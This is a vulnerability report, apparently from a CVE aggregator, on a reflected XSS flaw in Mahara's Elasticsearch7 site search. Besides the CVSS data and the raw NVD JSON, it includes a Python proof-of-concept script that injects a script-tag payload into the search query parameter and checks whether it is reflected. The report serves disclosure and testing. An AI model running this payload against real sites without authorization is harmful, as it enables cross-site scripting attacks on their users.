Security Vulnerability Report
CVE-2025-61872 CVSS 6.1 MEDIUM

CVE-2025-61872

Published: 2026-04-24 15:16:25
Last Modified: 2026-04-24 17:54:36

Description

Mahara versions before 25.04.2 and 24.04.11 are vulnerable to displaying search results that can trigger XSS via a malicious search query string. This occurs in the 'search site' feature when using the Elasticsearch7 search plugin. The Elasticsearch function does not properly sanitize input in the query parameter.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Mahara < 25.04.2
Mahara < 24.04.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2025-61872 Mahara XSS Vulnerability
# This script demonstrates testing for the XSS flaw in the search query.
import requests


def check_xss(target_url):
    # The vulnerability occurs in the search site feature with Elasticsearch7
    # Injecting a basic JavaScript payload into the query parameter
    payload = '"><script>alert(1)</script>'
    search_endpoint = f"{target_url}/search/index.php"
    params = {
        "query": payload  # Vulnerable parameter
    }
    try:
        response = requests.get(search_endpoint, params=params, timeout=10)
        # Check if the payload is reflected unescaped in the response
        if payload in response.text:
            print(f"[+] Potential XSS found at: {response.url}")
            print("[+] Payload reflected in response.")
        else:
            print("[-] Payload not reflected or target patched.")
    except requests.RequestException as e:
        print(f"[!] Error connecting to target: {e}")


if __name__ == "__main__":
    target = "http://localhost/mahara"  # Replace with actual target
    check_xss(target)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61872", "sourceIdentifier": "[email protected]", "published": "2026-04-24T15:16:25.320", "lastModified": "2026-04-24T17:54:36.243", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Mahara before 25.04.2 and 24.04.11 are vulnerable to displaying results that can trigger XSS via a malicious search query string. This occurs in the 'search site' feature when using the Elasticsearch7 search plugin. The Elasticsearch function does not properly sanitize input in the query parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://mahara.org", "source": "[email protected]"}, {"url": "https://mahara.org/interaction/forum/topic.php?id=9851", "source": "[email protected]"}]}}